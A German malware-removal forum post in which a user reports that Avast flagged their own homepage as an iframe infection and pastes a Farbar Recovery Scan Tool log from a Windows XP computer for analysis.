Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)
-   -   Blockierung meiner Webseite durch Avast. (https://www.trojaner-board.de/166417-blockierung-meiner-webseite-avast.html)

nemo33701 25.04.2015 12:47
Blockierung meiner Webseite durch Avast.
 
[B]Hallo mein avast hat eine schädliche webseite blokiert das meine homepage ist

objekt: hxxp://nemo33701.npage.de/|{gzip}

infektion:HTML:Iframe-inf

prozess:C:\Programme\Opera\28.0.1750.51_1\opera.exe

FRST
FRST Logfile:
Code:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-04-2015
Ran by Administrator (administrator) on CHRIS-DA78A7F47 on 25-04-2015 13:12:16
Running from C:\Dokumente und Einstellungen\Administrator\Desktop
Loaded Profiles: Administrator (Available profiles: Administrator)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 8 (Default browser: Opera)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Avast Software s.r.o.) C:\Programme\AVAST Software\Avast\AvastSvc.exe
(Malwarebytes Corporation) C:\Programme\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Programme\Malwarebytes Anti-Malware\mbamservice.exe
(TeamViewer GmbH) C:\Programme\TeamViewer\TeamViewer_Service.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.EXE
(Intel Corporation) C:\WINDOWS\system32\igfxtray.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(Avast Software s.r.o.) C:\Programme\AVAST Software\Avast\AvastUI.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Malwarebytes Corporation) C:\Programme\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\WINDOWS\system32\wbem\unsecapp.exe
(Opera Software) C:\Programme\Opera\28.0.1750.51_1\opera.exe
() C:\Programme\Opera\28.0.1750.51_1\opera_crashreporter.exe
(Opera Software) C:\Programme\Opera\28.0.1750.51_1\opera.exe
(Opera Software) C:\Programme\Opera\28.0.1750.51_1\opera.exe
(Opera Software) C:\Programme\Opera\28.0.1750.51_1\opera.exe
(Opera Software) C:\Programme\Opera\28.0.1750.51_1\opera.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [17331200 2008-10-28] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Alcmtr] => C:\WINDOWS\ALCMTR.EXE [57344 2008-06-19] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Programme\Adobe\Reader 9.0\Reader\Reader_sl.exe [34672 2008-06-12] (Adobe Systems Incorporated)
HKLM\...\Run: [AvastUI.exe] => C:\Programme\AVAST Software\Avast\AvastUI.exe [5512912 2015-03-27] (Avast Software s.r.o.)
HKU\S-1-5-21-1214440339-764733703-839522115-500\...\Run: [Xvid] => C:\Programme\Xvid\CheckUpdate.exe [8192 2011-01-17] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Programme\AVAST Software\Avast\ashShell.dll [2015-03-27] (Avast Software s.r.o.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-1214440339-764733703-839522115-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
HKU\S-1-5-21-1214440339-764733703-839522115-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2008-06-11] (Adobe Systems Incorporated)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Programme\AVAST Software\Avast\aswWebRepIE.dll [2015-03-27] (Avast Software s.r.o.)
Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\msdaipp.dll [2008-04-14] (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 192.168.0.2

FireFox:
========
FF Plugin HKU\S-1-5-21-1214440339-764733703-839522115-500: @www.flatcast.com/FlatViewer 5.2 -> C:\DOKUME~1\ADMINI~1\ANWEND~1\Mozilla\Plugins\NpFv530.dll [2011-09-23] (1 mal 1 Software GmbH)
FF Plugin ProgramFiles/Appdata: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\mozilla\plugins\NpFp530.dll [2011-09-23] (1 mal 1 Software GmbH)
FF Plugin ProgramFiles/Appdata: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\mozilla\plugins\NpFv530.dll [2011-09-23] (1 mal 1 Software GmbH)
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Programme\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Programme\AVAST Software\Avast\WebRep\FF [2015-03-18]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Programme\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-03-18]

Opera:
=======
OPR Extension: (Adblock Plus) - C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2015-03-19]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Programme\AVAST Software\Avast\AvastSvc.exe [343336 2015-03-27] (Avast Software s.r.o.)
R2 MBAMScheduler; C:\Programme\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-03-17] (Malwarebytes Corporation)
R2 MBAMService; C:\Programme\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
S2 SkypeUpdate; C:\Programme\Skype\Updater\Updater.exe [315488 2015-02-18] (Skype Technologies)
R2 TeamViewer; C:\Programme\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-17] (TeamViewer GmbH)
S3 WMPNetworkSvc; C:\Programme\Windows Media Player\WMPNetwk.exe [920576 2006-11-03] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [24144 2015-03-27] ()
R2 aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [73440 2015-03-27] (Avast Software s.r.o.)
R1 aswRdr; C:\WINDOWS\system32\drivers\aswRdr.sys [55200 2015-03-27] (Avast Software s.r.o.)
R0 aswRvrt; C:\WINDOWS\system32\Drivers\aswRvrt.sys [49904 2015-03-27] ()
R1 aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [788272 2015-03-27] (Avast Software s.r.o.)
R1 aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [427736 2015-03-27] (Avast Software s.r.o.)
R1 aswTdi; C:\WINDOWS\system32\drivers\aswTdi.sys [57888 2015-03-27] (Avast Software s.r.o.)
R0 aswVmm; C:\WINDOWS\system32\Drivers\aswVmm.sys [208024 2015-03-27] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [119512 2015-04-25] (Malwarebytes Corporation)
S4 IntelIde; No ImagePath
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-14] (Microsoft Corporation)
U1 WS2IFSL; No ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-04-25 13:12 - 2015-04-25 13:13 - 00008377 _____ () C:\Dokumente und Einstellungen\Administrator\Desktop\FRST.txt
2015-04-25 13:12 - 2015-04-25 13:12 - 00000000 ____D () C:\FRST
2015-04-25 13:11 - 2015-04-25 13:11 - 01139200 _____ (Farbar) C:\Dokumente und Einstellungen\Administrator\Desktop\FRST.exe
2015-04-25 11:47 - 2015-04-25 12:02 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Desktop\Deutsche Disco Box - Vol. 62
2015-04-23 11:46 - 2015-04-24 21:41 - 00000564 ____H () C:\os357577.bin
2015-04-23 11:46 - 2015-04-24 21:41 - 00000552 ____H () C:\WINDOWS\system32\ws073247.ocx
2015-04-23 11:46 - 2015-04-23 11:46 - 00000000 ____D () C:\WINDOWS\Vbox
2015-04-23 11:46 - 2015-04-23 11:46 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\Ulead Systems
2015-04-23 11:45 - 2015-04-23 11:46 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Ulead Systems
2015-04-23 11:45 - 2015-04-23 11:45 - 00001651 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Ulead GIF Animator 5.lnk
2015-04-23 11:45 - 2015-04-23 11:45 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Ulead GIF Animator 5 Trial
2015-04-23 11:43 - 2015-04-23 11:42 - 11154801 _____ (Ulead Systems) C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\ulead-gif-animator-5.05 [1].exe
2015-04-16 09:26 - 2015-04-16 09:26 - 00001653 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Avast Free Antivirus.lnk
2015-04-16 09:25 - 2015-03-27 12:58 - 00291312 _____ (Avast Software s.r.o.) C:\WINDOWS\system32\aswBoot.exe
2015-04-14 20:01 - 2014-04-13 19:11 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Desktop\pos-jingels
2015-04-11 10:35 - 2015-04-13 13:21 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2015-04-11 10:35 - 2015-04-11 10:35 - 00000000 ____D () C:\Programme\Microsoft.NET
2015-03-27 15:10 - 2015-03-27 15:10 - 00012288 ____H () C:\Dokumente und Einstellungen\Administrator\Desktop\photothumb.db
2015-03-27 13:04 - 2015-03-27 13:04 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB929399$
2015-03-27 13:03 - 2015-03-27 13:04 - 00006216 _____ () C:\WINDOWS\KB929399.log
2015-03-27 13:03 - 2015-03-27 13:03 - 00004415 _____ () C:\WINDOWS\KB954154.log
2015-03-27 13:03 - 2015-03-27 13:03 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB954154_WM11$
2015-03-27 12:58 - 2015-03-27 12:58 - 00043112 _____ (Avast Software s.r.o.) C:\WINDOWS\avastSS.scr
2015-03-27 12:18 - 2015-03-27 12:18 - 00009367 _____ () C:\WINDOWS\KB941569.log
2015-03-27 12:18 - 2015-03-27 12:18 - 00006000 _____ () C:\WINDOWS\KB939683.log
2015-03-27 12:18 - 2015-03-27 12:18 - 00005734 _____ () C:\WINDOWS\KB2834904-v2.log
2015-03-27 12:18 - 2015-03-27 12:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB941569$
2015-03-27 12:18 - 2015-03-27 12:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB939683$
2015-03-27 12:18 - 2015-03-27 12:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2834904-v2_WM11$
2015-03-26 12:09 - 2015-03-26 12:09 - 00000810 _____ () C:\Dokumente und Einstellungen\Administrator\Desktop\Media Player Classic.lnk
2015-03-26 12:08 - 2015-03-26 12:08 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\MPC-HC
2015-03-26 12:07 - 2015-03-26 12:07 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\K-Lite Codec Pack
2015-03-26 12:06 - 2015-03-26 12:07 - 00000000 ____D () C:\Programme\K-Lite Codec Pack
2015-03-26 11:52 - 2015-03-26 11:52 - 00000000 ____D () C:\Programme\Xvid
2015-03-26 11:52 - 2015-03-26 11:52 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Xvid
2015-03-26 11:52 - 2014-10-19 19:12 - 00638976 _____ () C:\WINDOWS\system32\xvidcore.dll
2015-03-26 11:52 - 2014-10-19 19:12 - 00235520 _____ () C:\WINDOWS\system32\xvidvfw.dll
2015-03-26 11:52 - 2014-10-19 19:12 - 00147456 _____ () C:\WINDOWS\system32\xvid.ax
2015-03-26 11:49 - 2015-03-26 11:49 - 00003241 _____ () C:\WINDOWS\MSCompPackV1.log
2015-03-26 11:49 - 2015-03-26 11:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallMSCompPackV1$
2015-03-26 11:49 - 2007-07-27 11:41 - 00016760 ____N (Microsoft Corporation) C:\WINDOWS\system32\spmsg.dll
2015-03-26 11:47 - 2015-03-26 11:48 - 00000000 ____D () C:\Programme\Windows Media Connect 2
2015-03-26 11:46 - 2015-03-26 11:46 - 00000000 __HDC () C:\WINDOWS\$NtUninstallwmp11$
2015-03-26 11:45 - 2015-03-26 11:48 - 00015776 _____ () C:\WINDOWS\wmp11.log
2015-03-26 11:42 - 2015-03-26 11:44 - 00025570 _____ () C:\WINDOWS\WMFDist11.log
2015-03-26 11:42 - 2015-03-26 11:42 - 00000000 __HDC () C:\WINDOWS\$NtUninstallWMFDist11$
2015-03-26 11:41 - 2015-03-26 11:41 - 00000000 __HDC () C:\WINDOWS\$NtUninstallWudf01000$
2015-03-26 11:41 - 2015-03-26 11:41 - 00000000 ____D () C:\WINDOWS\system32\LogFiles
2015-03-26 11:40 - 2015-03-26 11:41 - 00008052 _____ () C:\WINDOWS\Wudf01000Inst.log

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-04-25 13:13 - 2015-03-18 18:47 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp
2015-04-25 12:53 - 2015-03-18 20:56 - 00000892 _____ () C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2015-04-25 12:32 - 2015-03-18 20:32 - 00000356 ____H () C:\WINDOWS\Tasks\avast! Emergency Update.job
2015-04-25 12:28 - 2015-03-18 20:41 - 00119512 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-04-25 12:28 - 2015-03-18 18:43 - 01966834 _____ () C:\WINDOWS\WindowsUpdate.log
2015-04-25 12:27 - 2015-03-18 20:52 - 00000428 _____ () C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1426704743.job
2015-04-25 12:27 - 2015-03-18 20:23 - 00000238 _____ () C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Benachrichtigung – Anmeldung.job
2015-04-25 12:27 - 2015-03-18 18:47 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-04-25 12:27 - 2006-02-28 14:00 - 00012984 _____ () C:\WINDOWS\system32\wpa.dbl
2015-04-25 12:02 - 2015-03-18 18:47 - 00032422 _____ () C:\WINDOWS\SchedLgU.Txt
2015-04-25 12:02 - 2015-03-18 18:47 - 00000190 ___SH () C:\Dokumente und Einstellungen\Administrator\ntuser.ini
2015-04-25 11:43 - 2015-03-18 20:25 - 00000434 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{C3282EEF-4ECE-428A-A266-FD297A3BF13F}.job
2015-04-25 11:15 - 2015-03-18 20:45 - 00000884 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2015-04-25 08:24 - 2015-03-18 18:34 - 00101440 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2015-04-24 23:05 - 2015-03-18 20:37 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Desktop\pirates hgs
2015-04-24 22:55 - 2015-03-18 23:08 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Desktop\Neuer Ordner hgs
2015-04-24 22:45 - 2015-03-18 20:37 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Desktop\musik februar 2015
2015-04-24 22:36 - 2015-03-19 13:28 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\PhotoScape
2015-04-24 22:30 - 2015-03-18 18:40 - 00016205 _____ () C:\WINDOWS\wmsetup.log
2015-04-24 21:59 - 2015-03-18 22:02 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\Skype
2015-04-24 20:45 - 2015-03-18 20:31 - 00016416 _____ () C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Anwendungsdaten\GDIPFONTCACHEV1.DAT
2015-04-24 19:33 - 2015-03-19 14:54 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\AvaFind Data
2015-04-24 10:38 - 2015-03-18 22:02 - 00002243 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Skype.lnk
2015-04-23 11:45 - 2015-03-20 12:43 - 00000000 ____D () C:\Programme\Ulead Systems
2015-04-23 11:45 - 2015-03-20 12:42 - 00000000 ____D () C:\WINDOWS\Noslip
2015-04-23 11:45 - 2015-03-18 18:51 - 00000000 ___HD () C:\Programme\InstallShield Installation Information
2015-04-23 11:45 - 2015-03-18 18:51 - 00000000 ____D () C:\Programme\Gemeinsame Dateien\InstallShield
2015-04-23 11:45 - 2015-03-18 18:34 - 00000000 ___RD () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme
2015-04-23 11:44 - 2015-03-18 18:35 - 00000000 ___RD () C:\Programme
2015-04-23 11:24 - 2015-03-20 12:43 - 00000229 _____ () C:\WINDOWS\ULEAD32.INI
2015-04-23 11:22 - 2015-03-20 12:43 - 00000457 ____H () C:\WINDOWS\system32\ws344069.ocx
2015-04-23 11:22 - 2015-03-20 12:43 - 00000450 ____H () C:\os466477.bin
2015-04-23 11:20 - 2015-03-20 12:43 - 00000000 ____D () C:\WINDOWS\PreviewSoft
2015-04-23 10:25 - 2015-03-18 20:38 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Desktop\werbung
2015-04-20 12:44 - 2015-03-18 22:02 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Skype
2015-04-16 09:40 - 2015-03-18 18:57 - 00000000 ____D () C:\Programme\Gemeinsame Dateien\Adobe AIR
2015-04-16 09:27 - 2015-03-18 20:33 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\AVAST Software
2015-04-16 09:26 - 2015-03-18 18:34 - 00357017 _____ () C:\WINDOWS\setupapi.log
2015-04-15 18:15 - 2015-03-18 20:45 - 00778416 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2015-04-15 18:15 - 2015-03-18 20:45 - 00142512 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2015-04-15 09:10 - 2015-03-18 20:20 - 00000000 ____D () C:\WINDOWS\system32\MRT
2015-04-15 09:07 - 2015-03-18 20:12 - 125832184 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-04-12 15:19 - 2015-03-18 18:35 - 00946978 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-04-11 10:35 - 2015-03-18 19:27 - 00000000 ____D () C:\WINDOWS\system32\mui
2015-04-08 22:07 - 2015-03-18 20:52 - 00000000 ____D () C:\Programme\Opera
2015-04-08 15:00 - 2015-03-18 20:23 - 00000232 _____ () C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Monatliche Benachrichtigung.job
2015-04-07 22:03 - 2015-03-18 18:37 - 00000216 _____ () C:\WINDOWS\wiadebug.log
2015-04-07 22:03 - 2015-03-18 18:37 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2015-04-03 19:29 - 2015-03-18 21:40 - 00000000 ____D () C:\Programme\WinMX 2.6D Deutsch Chatterclub Edition
2015-04-03 16:19 - 2015-03-20 16:52 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\TS3Client
2015-03-28 10:26 - 2015-03-18 19:44 - 00118318 _____ () C:\WINDOWS\spupdsvc.log
2015-03-28 00:29 - 2015-03-18 18:47 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator
2015-03-27 13:04 - 2015-03-18 18:35 - 01074646 _____ () C:\WINDOWS\iis6.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00969892 _____ () C:\WINDOWS\FaxSetup.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00472781 _____ () C:\WINDOWS\ocgen.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00446508 _____ () C:\WINDOWS\tsoc.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00331100 _____ () C:\WINDOWS\comsetup.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00301928 _____ () C:\WINDOWS\msmqinst.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00198843 _____ () C:\WINDOWS\ntdtcsetup.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00170329 _____ () C:\WINDOWS\netfxocm.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00069168 _____ () C:\WINDOWS\MedCtrOC.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00053714 _____ () C:\WINDOWS\ocmsn.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00049655 _____ () C:\WINDOWS\tabletoc.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00048610 _____ () C:\WINDOWS\msgsocm.log
2015-03-27 13:04 - 2015-03-18 18:35 - 00001374 _____ () C:\WINDOWS\imsins.log
2015-03-27 13:03 - 2015-03-18 18:35 - 00001374 _____ () C:\WINDOWS\imsins.BAK
2015-03-27 12:58 - 2015-03-18 20:32 - 00788272 _____ (Avast Software s.r.o.) C:\WINDOWS\system32\Drivers\aswSnx.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00427736 _____ (Avast Software s.r.o.) C:\WINDOWS\system32\Drivers\aswSP.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00208024 _____ () C:\WINDOWS\system32\Drivers\aswVmm.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00073440 _____ (Avast Software s.r.o.) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00057888 _____ (Avast Software s.r.o.) C:\WINDOWS\system32\Drivers\aswTdi.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00055200 _____ (Avast Software s.r.o.) C:\WINDOWS\system32\Drivers\aswRdr.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00049904 _____ () C:\WINDOWS\system32\Drivers\aswRvrt.sys
2015-03-27 12:58 - 2015-03-18 20:32 - 00024144 _____ () C:\WINDOWS\system32\Drivers\aswHwid.sys
2015-03-27 12:19 - 2015-03-18 20:07 - 00029716 _____ () C:\WINDOWS\KB2378111.log
2015-03-27 12:19 - 2015-03-18 20:07 - 00028679 _____ () C:\WINDOWS\KB975558.log
2015-03-27 12:19 - 2015-03-18 20:06 - 00023126 _____ () C:\WINDOWS\KB954155.log
2015-03-27 12:19 - 2015-03-18 19:29 - 00143159 _____ () C:\WINDOWS\updspapi.log
2015-03-27 12:18 - 2015-03-18 20:07 - 00028169 _____ () C:\WINDOWS\KB978695.log
2015-03-27 12:18 - 2015-03-18 20:06 - 00032270 _____ () C:\WINDOWS\KB952069.log
2015-03-26 12:29 - 2015-03-18 20:44 - 00000000 ____D () C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Anwendungsdaten\Adobe
2015-03-26 11:49 - 2015-03-18 18:47 - 00000768 _____ () C:\Dokumente und Einstellungen\Administrator\Startmenü\Programme\Windows Media Player.lnk
2015-03-26 11:49 - 2015-03-18 18:47 - 00000000 ___RD () C:\Dokumente und Einstellungen\Administrator\Startmenü\Programme
2015-03-26 11:49 - 2015-03-18 18:47 - 00000000 ____D () C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Temp
2015-03-26 11:48 - 2015-03-18 18:44 - 00023392 _____ () C:\WINDOWS\system32\nscompat.tlb
2015-03-26 11:48 - 2015-03-18 18:44 - 00016832 _____ () C:\WINDOWS\system32\amcompat.tlb
2015-03-26 11:48 - 2006-02-28 14:00 - 00000507 _____ () C:\WINDOWS\win.ini
2015-03-26 11:46 - 2015-03-18 19:27 - 00000000 ____D () C:\WINDOWS\Help
2015-03-26 11:44 - 2015-03-18 18:44 - 00316640 _____ () C:\WINDOWS\WMSysPr9.prx
2015-03-26 11:44 - 2015-03-18 18:43 - 00000000 __SHD () C:\Dokumente und Einstellungen\All Users\DRM
2015-03-26 00:07 - 2015-03-18 20:39 - 00000749 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2015-03-26 00:07 - 2015-03-18 20:39 - 00000000 ____D () C:\Programme\Malwarebytes Anti-Malware
2015-03-26 00:07 - 2015-03-18 20:39 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Malwarebytes Anti-Malware

Some content of TEMP:
====================
C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\setup_wm.exe
C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}_NIS_8495.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

==================== End Of Log ============================
--- --- ---
AdditionFRST Additions Logfile:
Code:
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-04-2015
Ran by Administrator at 2015-04-25 13:14:04
Running from C:\Dokumente und Einstellungen\Administrator\Desktop
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1214440339-764733703-839522115-500 - Administrator - Enabled) => %SystemDrive%\Dokumente und Einstellungen\Administrator
Gast (S-1-5-21-1214440339-764733703-839522115-501 - Limited - Disabled)
Hilfeassistent (S-1-5-21-1214440339-764733703-839522115-1000 - Limited - Disabled)
SUPPORT_388945a0 (S-1-5-21-1214440339-764733703-839522115-1002 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {7591DB91-41F0-48A3-B128-1A293FD8233D}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 17.0.0.144 - Adobe Systems Incorporated)
Adobe Flash Player 17 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 17.0.0.169 - Adobe Systems Incorporated)
Adobe Flash Player 17 PPAPI (HKLM\...\Adobe Flash Player PPAPI) (Version: 17.0.0.169 - Adobe Systems Incorporated)
Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A90000000001}) (Version: 9.0.0 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM\...\Avast) (Version: 10.2.2215 - AVAST Software)
Flatcast Producer Plugin 5.3.0.784 (HKLM\...\Flatcast Producer 5.3_is1) (Version: - 1 mal 1 Software GmbH)
